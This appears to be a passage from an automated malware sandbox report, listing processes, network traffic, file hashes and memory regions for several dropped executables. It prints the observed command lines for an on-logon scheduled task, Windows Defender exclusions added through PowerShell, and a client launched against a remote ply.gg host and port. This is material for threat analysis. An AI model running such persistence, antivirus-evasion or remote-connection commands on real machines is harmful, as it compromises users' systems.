PID 3700 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\SysWOW64\cmd.exe
PID 3700 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\SysWOW64\cmd.exe
PID 3700 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\SysWOW64\cmd.exe
PID 3700 wrote to memory of 4436 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3700 wrote to memory of 4436 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3700 wrote to memory of 4436 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3700 wrote to memory of 4436 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3700 wrote to memory of 4436 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3700 wrote to memory of 4436 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3700 wrote to memory of 4436 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3700 wrote to memory of 4436 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Processes

C:\Users\Admin\AppData\Local\Temp\custom111.exe

"C:\Users\Admin\AppData\Local\Temp\custom111.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1424 --field-trial-handle=2180,i,12780723798465539942,12010519452607841069,262144 --variations-seed-version /prefetch:8

C:\Users\Admin\AppData\Local\Temp\Client.exe

"C:\Users\Admin\AppData\Local\Temp\Client.exe"

C:\Users\Admin\AppData\Local\Temp\switched.exe

"C:\Users\Admin\AppData\Local\Temp\switched.exe"

C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe

"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"

C:\Users\Admin\AppData\Local\Temp\tesetey.exe

"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"

C:\Windows\system32\certutil.exe

certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5

C:\Windows\system32\find.exe

find /i /v "md5"

C:\Windows\system32\find.exe

find /i /v "certutil"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\s0g0bsss\s0g0bsss.cmdline"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$SXR" /tr '"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"' & exit

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "$SXR" /tr '"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"'

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp2BD4.tmp.bat""

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2D2C.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC91A0527E7C684A849C87D678CC346AB.TMP"

C:\Windows\SysWOW64\timeout.exe

timeout 3

C:\Windows\explorer.exe

"C:\Windows\explorer.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k start /b C:\Users\Admin\AppData\Local\Temp\cvtresa.exe & exit

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM

C:\Users\Admin\AppData\Local\Temp\cvtresa.exe

C:\Users\Admin\AppData\Local\Temp\cvtresa.exe

C:\Windows\System32\CatRoot\$SXR\$SXR.exe

"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 203.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 keyauth.win udp
US 104.26.1.5:443 keyauth.win tcp
US 8.8.8.8:53 x2.c.lencr.org udp
GB 173.222.13.40:80 x2.c.lencr.org tcp
US 8.8.8.8:53 40.13.222.173.in-addr.arpa udp
US 8.8.8.8:53 5.1.26.104.in-addr.arpa udp
US 104.26.1.5:443 keyauth.win tcp
N/A 127.0.0.1:49889 tcp
N/A 127.0.0.1:49891 tcp
N/A 127.0.0.1:49896 tcp
N/A 127.0.0.1:49898 tcp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
GB 172.217.16.234:443 chromewebstore.googleapis.com tcp
US 8.8.8.8:53 234.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 88.16.208.104.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 case-shield.gl.at.ply.gg udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 operating-noble.gl.at.ply.gg udp
US 147.185.221.18:52033 operating-noble.gl.at.ply.gg tcp
US 147.185.221.17:26501 case-shield.gl.at.ply.gg tcp
US 8.8.8.8:53 17.221.185.147.in-addr.arpa udp
US 8.8.8.8:53 18.221.185.147.in-addr.arpa udp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.186.192:80 ipinfo.io tcp
US 8.8.8.8:53 192.186.117.34.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\Client.exe

MD5 cad2b1bc54cc85d5d0c0a425e66947f4
SHA1 235d00ef89adb5b987f8e0f253ce2e483a136d24
SHA256 870fad411f0f32d80ea71e0261685acb76be06153f702b421d120cd6e2f2fe03
SHA512 e9b6b4fcd8296e80e93a60474d279df92b6882f732aa14af129ec3da81a06519ad4b1ac45bf1c03382d438990726729ef8750e642ed9b406a01201d76ebe69c6

C:\Users\Admin\AppData\Local\Temp\Client.exe

MD5 295f171ff87e2bbeb3acbe1deae772fc
SHA1 ccfad201deb07a4bc9af2c25d266978691bd4dc7
SHA256 dbdd6f6c15a3f7cf555aaae257f757fef26920cb08b141737f0c2c482be9a266
SHA512 04860b88e0cafadfff6edcad1889fcacb127a3bb9531909bbba4f70dc7b7b5d6ab562a1a682504a4f573b3cabc87185d680c8be699bcbee5370089112ff2547e

C:\Users\Admin\AppData\Local\Temp\switched.exe

MD5 ff0f617153400ce370229083d7c6eb22
SHA1 ec939725c8fbb61fb61f65f2db0b5f34abbd6c42
SHA256 d01d25d000daecae2fa41e032fb9e2ad52d8baf963155c30cf923a6693d81a8f
SHA512 a49d5d6d5f6b79e07681ea8e1be3d521e326afa28f6ccab3b0c8b3b9c60af08940aed35690efc7735b29f3b89763eec435a91035bd381ff7d70f48117c8f6f9d

C:\Users\Admin\AppData\Local\Temp\switched.exe

MD5 fe9ae5027af84d7f74fa84ef2b47af65
SHA1 e997a2bbb663c2836b70836bbc3e1f5aac17186c
SHA256 6f7aa576b0388478562162622a0204520cd916d190ec8e024fd3b8dc36ed9e3f
SHA512 5be07c8c6aad5226ab29c321274325e816100be7ea340865dfe6e946d4e911214430f3e02ed4ccdb8048f9eeeff3e760e4c99ff5b6735148c385330bc2745963

C:\Users\Admin\AppData\Local\Temp\switched.exe

MD5 e08f770275ffecedcfb5522166299b3a
SHA1 ebf5b9641cbdccf5d42dbef0450a79d07e241f9b
SHA256 4b91ecfacae5659f92ef9e937a3d3938bbe62efc92083e556d3f610bb6a1d80f
SHA512 d7541f1a66153165957ff216deb5d73bc1a82697e01a46a25ee007243c683b1a84411a4892122237f41806bd22cfa90f42e4d71528fac69c1128a1dd32ab2cc4

C:\Users\Admin\AppData\Local\Temp\Client.exe

MD5 0113cfd72164ed38e62fb5932fa49287
SHA1 179ce87d746d2e75521250e9e43cf3767c08cba6
SHA256 7968a7fbdec7cbca5ddc2bbfd5b216a778b89c1712712bdd4ce326fa808710e6
SHA512 90ae925af55a5242f6aa5329b1f7f48f284723aa122ba86b77969db55215412000a998ee15104f472d2d497313176c3badf16d9ef8e83432a40988603c32b76e

C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe

MD5 d7bc045f4b2c8431a271e8cffe6429d6
SHA1 b7be547021fd997a5e8cc3681252b76f3d5705a5
SHA256 0362d145cb8f9a4dc44556095ab24e6ddbea5979265daa3b25bcd64588eb13b2
SHA512 0e9ca893d79eedcd261ce3729bdfe18b7f02a575a5b2cfbf5aa9588786a71dddde42b3ba38c29e5fd29ed560c4a5d1b2c2537bb58bc31634b9fc01311b706fd3

C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe

MD5 3c44a38f09b794e632eee49ad99cd1bb
SHA1 6e9b131f1a891ca629e8159608b6fb20b0fc545a
SHA256 652f2f8ec7ea467ffc32ab89df2f52d60d424cea8d9d4947dddc23d4c351de21
SHA512 1685d6eb81c91b52506a5261fc0c0387889f8ae184ebd962058cb8e46c6f5dbdc9e073c45ed66921fa74e430b5578c41a90202a5e9f17b58618527673cd6b7a1

C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe

MD5 30c59e80a5aac9b0c130f5ed8c3f099f
SHA1 66e89c946359dbc0fdd8cf169ab423638c6af38e
SHA256 9240842c1b75df1e7a2eed604db7c4d8a9184aedb91fb9be968ae7b1ca30602a
SHA512 4c0847161ebd522a806b569bef6d1f00192928db6c5c5f946f35a5148d642d2d8556283521dcbcdfa4e341771d861f6ac7e2cd7f4c03724f0a846e9f5f886110

memory/4288-30-0x00007FF7ED6C0000-0x00007FF7EDAFC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tesetey.exe

MD5 0f0838bc6642dd6bc603368e50b4aba3
SHA1 932bd4d1c11996bf8ac3ac74a94b266e96d44c36
SHA256 4acfa7fccfdd11c17fbb2e7a861683f749cbf6420f0d83d484a6024ff280a7a9
SHA512 a39605eaa160d4f918393c600d42873f2e6bfb54506edfbe590aac0f75d12b4aa66ff91192c0522c235695a9c6b95cd2dbe308b548b5f121ca6b6b7696029860

C:\Users\Admin\AppData\Local\Temp\tesetey.exe

MD5 006a580425f3d4d9289a981fe3f22ae6
SHA1 eb69fd8daadbe4ba3b5819a76347354fb0849df7
SHA256 1a0c2ca9ae227e02409686d2f199b3bd6bd23d6ef44ed28d027839d88e6c8f70
SHA512 26d0d55e2b76576c136b6cec2954e51c72bb5fc43cec11bb3b000e911206cf0ac82a5a6350f297157e7533123db84f1737e708c0b0c97117c34611eb0f3869b0

memory/2548-39-0x00000000752D0000-0x0000000075A80000-memory.dmp

memory/3700-40-0x00000000752D0000-0x0000000075A80000-memory.dmp

memory/3700-41-0x0000000000020000-0x00000000000A2000-memory.dmp

memory/2548-42-0x00000000000F0000-0x0000000000730000-memory.dmp

memory/4288-43-0x00007FF7ED6C0000-0x00007FF7EDAFC000-memory.dmp

memory/3700-44-0x0000000004A40000-0x0000000004ADC000-memory.dmp

memory/2548-45-0x00000000752D0000-0x0000000075A80000-memory.dmp

memory/3700-46-0x0000000004C80000-0x0000000004D12000-memory.dmp

memory/3700-47-0x00000000752D0000-0x0000000075A80000-memory.dmp

memory/3700-48-0x0000000004C50000-0x0000000004C60000-memory.dmp

memory/3700-49-0x00000000068E0000-0x0000000006E84000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\s0g0bsss\s0g0bsss.cmdline

MD5 615715b3461189c0896e22db958b9b7f
SHA1 72814d2e434f3e03ab36d36b1bbc3c2e62fe300d
SHA256 65aee4c646a266882d5d5724476ab93c5f013c57f9f835d264e64bde06214173
SHA512 2fc5a91e197ddeff0b5defd7a85dc08c1bec810ed0b5d4b8ca6b9b54c607ba853928a8505ff4db9698a184b64e194d5f875f647a19687ddbbe8ea6e206293396

\??\c:\Users\Admin\AppData\Local\Temp\s0g0bsss\s0g0bsss.0.cs

MD5 14846c9faaef9299a1bf17730f20e4e6
SHA1 8083da995cfaa0e8e469780e32fcff1747850eb6
SHA256 61bc7b23a430d724b310e374a67a60dd1e1f883c6dd3a98417c8579ba4973c1b
SHA512 549d99dbb7376d9d6106ad0219d6cf22eb70c80d54c9ad8c7d0b04a33d956515e55c9608ab6eec0733f2c23602867eb85b43e58200ded129958c7de7ed22efb1

memory/2548-55-0x0000000000EC0000-0x0000000000EE2000-memory.dmp

memory/3700-56-0x0000000004C50000-0x0000000004C60000-memory.dmp

memory/2548-57-0x0000000000F60000-0x0000000000FC6000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\CSC91A0527E7C684A849C87D678CC346AB.TMP

MD5 6d4e315ddb659723cf270858a8023839
SHA1 0df893c7f7f48483e29d8db81bfabc8456ba24a9
SHA256 f6528ea00f868ca00663e6aeff8def75c2db4a0b7012d9836f9267679b0e47f0
SHA512 70a5bb19c9384117a21eeb1ce2e44ffc055dbf5ff958e0b912823c353a283606bafb1b7d7a5c942ffe8ecd3890c88b88597d027c19952156fe959962422339a6

C:\Users\Admin\AppData\Local\Temp\RES2D2C.tmp

MD5 b56b29489e99504a995c54df86c90307
SHA1 acbd9445b74315f5bca4f80b1b46df5b96d83c96
SHA256 7d23e5c501e8cabb2e5909a4e1947be0f3709ab09bcf29e4a22286c15d4dcdb4
SHA512 c6bff1003a94fb2e39cf252f8f6eece4c36840cac3770ea2736566e4df2e9fdcac2e75fba5040f13f8e47cdc48250b6b074f4dcb4552001cfb9208bab3fd8074

C:\Users\Admin\AppData\Local\Temp\tmp2BD4.tmp.bat

MD5 975afadeb2c27378380d5aa0bb060ee3
SHA1 38d971c2348869d177b318481aaf219e948f7969
SHA256 46b3be7075739bc2200b89b16992b55b104ddd6b38289b924636d34c2309e049
SHA512 6a612587a02eae66f942546e16ee089a8764d7681c84ce042b97a9cef15f3392959e9682961dcca11c81c8930db5a610c13030d84582324907d36ea9f783b2a6

memory/2548-72-0x00000000752D0000-0x0000000075A80000-memory.dmp

memory/4436-73-0x0000000000400000-0x0000000000424000-memory.dmp

memory/4436-74-0x00000000752D0000-0x0000000075A80000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\cvtresa.exe

MD5 9c9f3281f753e2df4a08055e711d8304
SHA1 f890cd4a56e9bbd5d6dc6e93848516058a419066
SHA256 38700ec0964dff88279bd9dfb4942a1b1cc6f480af7e870246c7f4112b35edac
SHA512 a621ef20b52e4177266035c7fc0b4459c6cbdb1b5d4f09ebfbd9f742594bc74e51a32c4f6896fac8c8acaa7a4c88af37a5445f034ea7f09404432199a862d0a9

memory/4324-78-0x00000000004E0000-0x00000000004E8000-memory.dmp

C:\Windows\System32\CatRoot\$SXR\$SXR.exe

MD5 2da0d5e75917e1bf303628b461973a13
SHA1 a897fc3063d4b6948db4abca3c142e2b64c0da45
SHA256 e842f4a6f443b858644ddacd2563639889d1667666cd72ac0f95bbfeaeede1a5
SHA512 887624ad9a600261a081be98d3d624b57f120500584068521e784ef5f3d111a2f5fb6c4403cd8506a6cd010b2497e9b26499c30809b50aade5a6269313b7c79f

C:\Windows\System32\CatRoot\$SXR\$SXR.exe

MD5 6e30e0586da2ef652e4f297206bd956f
SHA1 d6df8267ee2950b7e256047e5889e623b3a017cf
SHA256 4704db5292fdd690c261526125686304abd015378ef72e4f9125d693e0499e6f
SHA512 3564cbb0a05df8e6ca63fae6500994a5e8a5724910e4c6c4bbec0a88f670b9853f4397864f645773e8d2c0d6181d42b9133fe6a560baa7eea61655c1b49716c4

memory/4324-82-0x00007FFAE0F40000-0x00007FFAE1A01000-memory.dmp

memory/932-83-0x00000000752D0000-0x0000000075A80000-memory.dmp

memory/932-84-0x0000000005EE0000-0x0000000005EF0000-memory.dmp

memory/4324-85-0x000000001B0F0000-0x000000001B100000-memory.dmp

memory/4436-86-0x0000000005160000-0x0000000005170000-memory.dmp

memory/1928-88-0x0000000003610000-0x0000000003611000-memory.dmp

memory/1768-94-0x00000243DE570000-0x00000243DE590000-memory.dmp

memory/1768-96-0x00000243DE530000-0x00000243DE550000-memory.dmp

memory/1768-98-0x00000243DE9A0000-0x00000243DE9C0000-memory.dmp

memory/5336-108-0x00000000752D0000-0x0000000075A80000-memory.dmp

memory/5408-109-0x00000000752D0000-0x0000000075A80000-memory.dmp

memory/5336-110-0x00000000028F0000-0x0000000002900000-memory.dmp

memory/5408-113-0x00000000027A0000-0x00000000027B0000-memory.dmp

C:\Windows\System32\CatRoot\$SXR\Read.txt

MD5 79668a6729f0f219835c62c9e43b7927
SHA1 0cbbc7cc8dbd27923b18285960640f3dad96d146
SHA256 6f5747973e572dc3ec0ae4fd9eaf57263abb01c36b35fcddf96e89208b16496e
SHA512 bc3895b46db46617315ffaa2ec5e2b44b06e1d4921834be25e1b60b12f2fba900f0f496070eb9f362952abcfa0b3b359bf1ced7da5ec0db63541e0977e6ea4e3

memory/5336-114-0x0000000002930000-0x0000000002966000-memory.dmp

memory/5408-115-0x00000000027A0000-0x00000000027B0000-memory.dmp

memory/5336-119-0x00000000028F0000-0x0000000002900000-memory.dmp

memory/4436-116-0x00000000752D0000-0x0000000075A80000-memory.dmp

memory/4324-120-0x00007FFAE0F40000-0x00007FFAE1A01000-memory.dmp

memory/3700-124-0x00000000752D0000-0x0000000075A80000-memory.dmp

memory/5408-125-0x0000000004F70000-0x0000000005598000-memory.dmp

memory/932-126-0x00000000752D0000-0x0000000075A80000-memory.dmp

memory/4324-127-0x000000001B0F0000-0x000000001B100000-memory.dmp

memory/932-128-0x0000000005EE0000-0x0000000005EF0000-memory.dmp

memory/5336-129-0x0000000005020000-0x0000000005042000-memory.dmp

memory/5408-130-0x0000000004EE0000-0x0000000004F46000-memory.dmp